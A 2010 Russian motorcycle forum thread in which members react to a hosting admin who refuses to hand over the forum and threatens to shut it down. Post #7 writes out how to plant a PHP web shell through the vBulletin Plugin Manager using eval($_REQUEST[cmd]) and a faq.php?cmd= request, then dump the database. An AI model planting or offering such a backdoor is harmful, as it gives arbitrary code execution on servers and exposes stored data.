|
|
|
#1
|
|
Ниучюжыдь
Регистрация: 13.02.2009
Биография: На лёгком бодрящем, без фанатизма
Интересы: ХО
Марка мотоцикля: Suzuki SV1000s
Стаж вождения: с 85 года
Сообщений: 32,443
![]() Наш мотофорум - мотофорум Упыри.орг |
Сейчас не очень важна первопричина, сам до конца ее не понимаю. Важно следствие. На просьбу передать права админа, человек ответил следующее:
"Ок, нет проблемм... Домен зарегистрирован на Яна, лицензия на движек форума зарегистрированна на домен, так что переводите всё на другой хостинг, качайте движек с оф сайта и вперед, настраивать форум. Все модули, дополнения и улучшайзинги и дизайн мои, так что не обессуть, их я не отдам. Если есть желание, можешь содрать всё с форума сейчас. Доступ к МОЕМУ FTP серверу я не дам - он мой. Доступ к моим БД я не дам - SQL сервак тоже МОЙ. Дампы таблиц БД и другие бекапы отдам, но пока не знаю когда, у меня сейчас нет на это времени и денег, переливать их с сервака за свой счет я не буду. Полномочия сниму с себя 21.10.2010 в 23-58. Форум будет отключен 21.10.2010 в 23-59. Решай сам как дальше быть, всё твоё и так у тебя." я так понимаю, что это - такое тихое убийство Форума. все админы урезаны в правах, практически ничего не сделать. кто что посоветует?
__________________
Кочегарю на Паравозе. Катаю на Двадцатке. Адинокое сентиментальное жывотное. Злое. А что, невесты в городе есть? |
|
|
|
|
|
#2
|
|
Идейный Упырь
Регистрация: 25.01.2010
Чем Занимаетесь: бурим
Марка мотоцикля: TTR250=>SV650=>kawa Versys=>BMW F800 GS
Стаж вождения: х.з.
Сообщений: 871
![]() Наш мотофорум - мотофорум Упыри.орг |
Хуясе! То есть сегодня! Че так резко-то?
|
|
|
|
|
|
#3
|
|
Ниучюжыдь
Регистрация: 13.02.2009
Биография: На лёгком бодрящем, без фанатизма
Интересы: ХО
Марка мотоцикля: Suzuki SV1000s
Стаж вождения: с 85 года
Сообщений: 32,443
![]() Наш мотофорум - мотофорум Упыри.орг |
а вот так.
__________________
Кочегарю на Паравозе. Катаю на Двадцатке. Адинокое сентиментальное жывотное. Злое. А что, невесты в городе есть? |
|
|
|
|
|
#4
|
|
Ниучюжыдь
Регистрация: 13.02.2009
Биография: На лёгком бодрящем, без фанатизма
Интересы: ХО
Марка мотоцикля: Suzuki SV1000s
Стаж вождения: с 85 года
Сообщений: 32,443
![]() Наш мотофорум - мотофорум Упыри.орг |
А попытка то готовилась явно не вчера!
__________________
Кочегарю на Паравозе. Катаю на Двадцатке. Адинокое сентиментальное жывотное. Злое. А что, невесты в городе есть? |
|
|
|
|
|
#5
|
|
Идейный Упырь
Регистрация: 06.03.2010
Биография: Изгнан из АДа
Интересы: Мото
Марка мотоцикля: HONDA CB 400 SF,YAMAHA YZF R6,YAMAHA YZF R1
Сообщений: 280
![]() Наш мотофорум - мотофорум Упыри.орг |
Извиняюсь не вышел из под логина...ЖдуЯна!
__________________
WWW.MOTOARENA.RU Это подпись закалдована! будьте осторожны!Ее присутствие на упырях дает +500 Хелсов всем форумчанам! ![]() Мотошлемы,Мотоэкипировка,Мотозапчасти,Мотофорум,Мо тоциклы HONDA,Масло MOTUL,Мотокаталоги,Мотоновости,Мотовидео,Мотоперчатки,Ак кумуляторы Yuasa,Масляные фильтры MANN 89035192379 boss@motoarena.ru
|
|
|
|
|
|
#6
|
|
Титанический Упырь
Регистрация: 16.02.2009
Интересы: Клуб любителей кефира
Стаж вождения: с 89 года
Сообщений: 11,889
![]() Наш мотофорум - мотофорум Упыри.орг |
Надо решить спорные вопроссы "за круглым столо" на сколько я понял возникли разногласия.
|
|
|
|
|
|
#7
|
|
Идейный Упырь
Регистрация: 06.03.2010
Биография: Изгнан из АДа
Интересы: Мото
Марка мотоцикля: HONDA CB 400 SF,YAMAHA YZF R6,YAMAHA YZF R1
Сообщений: 280
![]() Наш мотофорум - мотофорум Упыри.орг |
вот что можно было сделать но Закрыли
В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin] вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем шелл будет тут: Код: http://localhost/forum/faq.php?cmd=phpinfo(); И через шелл сделай дамп
__________________
WWW.MOTOARENA.RU Это подпись закалдована! будьте осторожны!Ее присутствие на упырях дает +500 Хелсов всем форумчанам! ![]() Мотошлемы,Мотоэкипировка,Мотозапчасти,Мотофорум,Мо тоциклы HONDA,Масло MOTUL,Мотокаталоги,Мотоновости,Мотовидео,Мотоперчатки,Ак кумуляторы Yuasa,Масляные фильтры MANN 89035192379 boss@motoarena.ru
|
|
|
|
|
|
#8
|
|
Идейный Упырь
Регистрация: 14.06.2010
Биография: байкер в отпуске
Чем Занимаетесь: инженер ацких машин
Марка мотоцикля: VW T4
Стаж вождения: 8
Сообщений: 481
![]() Наш мотофорум - мотофорум Упыри.орг |
Афигеть! Демократию втоптали в грязь!
Я в этих делах темный человег! Могу только рыдать!!!! ((((((((((
__________________
Бороться за мир — всё равно, что трахаться за девственность. Бернард Шоу |
|
|
|
|
|
#9
|
|
Идейный Упырь
Регистрация: 23.01.2010
Биография: холост
Интересы: мото
Марка мотоцикля: недавно продал.
Стаж вождения: с рождения на колёсах
Сообщений: 940
![]() Наш мотофорум - мотофорум Упыри.орг |
эээ... нихера не понимаю... Апп штоле!
__________________
Зять -ни дать , ни взять (с) |
|
|
|
|
|
#10
|
|
Идейный Упырь
Регистрация: 20.03.2009
Интересы: дотазадрот
Марка мотоцикля: оппозит
Стаж вождения: 350к км
Сообщений: 1,800
![]() Наш мотофорум - мотофорум Упыри.орг |
мммм.. я не понимаю а что за человек то? делал все посторонний левый человек? ну тогда сами виноваты что такое допустили.. жаль(
__________________
Ёпта - я худой и деффективный дегенерат с кучей комплексов, и интернет - эт единственное место где я могу че та показать, ведь в жизни я ничтожен... |
|
|
|